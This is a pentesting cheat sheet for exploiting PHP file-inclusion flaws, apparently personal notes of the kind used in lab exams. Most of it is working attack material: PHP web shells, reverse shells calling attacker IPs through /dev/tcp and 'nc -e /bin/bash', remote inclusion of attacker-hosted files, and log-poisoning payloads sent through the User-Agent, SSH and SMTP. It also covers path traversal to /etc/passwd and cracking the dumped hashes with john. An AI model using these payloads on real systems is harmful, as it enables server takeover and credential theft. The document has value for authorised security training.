LFI
?file=php://filter/convert.base64-encode/recource=index.php
we should be able to see the source code.
create a evil.txt with the content
<?php system($_GET['cmd']);whoami ?>
or revshell
<?php echo system("0<&196;exec 196<>/dev/tcp/192.168.119.212/443; sh <&196 >&196 2>&196"); ?>
http://IP/section.php?page=http%3A%2F%2F192.168.119.137%2Fevil.txt&cmd=whoami
The following executes an ls command
data:text/plain,%3C?php%20echo%20shell_exec(%22ls%22)%20?%3E
http://IP/section.php?page=data:text/plain,%3C?php%20echo%20shell_exec(%22ls%22)%20?%3E
Basic unsecure code
<?php
$file = $_GET['file'];
include('directory/' . $file)
?>
Example URL: http//10.10.10.10/index.php?file=../../../../../../../etc/passwd
Basic unsecure code
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
Example URL: http//10.10.10.10/index.php?file=../../../../../../../etc/passwd
Secure code - More secure than above , but still expliotable
<?php
if(isset($_GET['file']))
{
$file=str_replace('../','',$_GET['file']);
$file=str_replace('./','',$file);
echo @file_get_contents('./'.$file);
}
?>
http://example.com/index.php?page=../../../etc/passwd%00 // Only applies to PHP 5.3.4 and below
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
<?php system($_GET['c']); ?>
<?php system($_REQUEST['c']$); ?>
<?php
$os = shell_exec('id');
echo "<pre>$os</pre>";
?>
<?php
$os = shell_exec('nc 10.10.10.10 4444 -e /bin/bash');
?>
// Replace IP & Port
Dangerous PHP Functions that can be abused for RCE
<?php
print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"]));
?>
Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log
Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log&c=id
OR
python -m SimpleHTTPServer 9000
Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>"
file_put_contents('shell.php') // What it will be saved locally on the target
file_get_contents('http://<local_ip>:9000/shell-php-rev.php') // Where is the shell on YOUR pc and WHAT is it called
Execute PHP Reverse Shell: http//10.10.10.10/shell.php
Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log
Payload: ssh <?php system($_GET['c']);?>@<target_ip>
Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id
Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/mail.log
telnet <target_ip> 25 // Replace with the target IP
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/mail.log&c=id
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
unshadow to crack the pass!
Syntax: unshadow pass.txt shadow.txt > hash
Then, crack it with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Last modified 9mo ago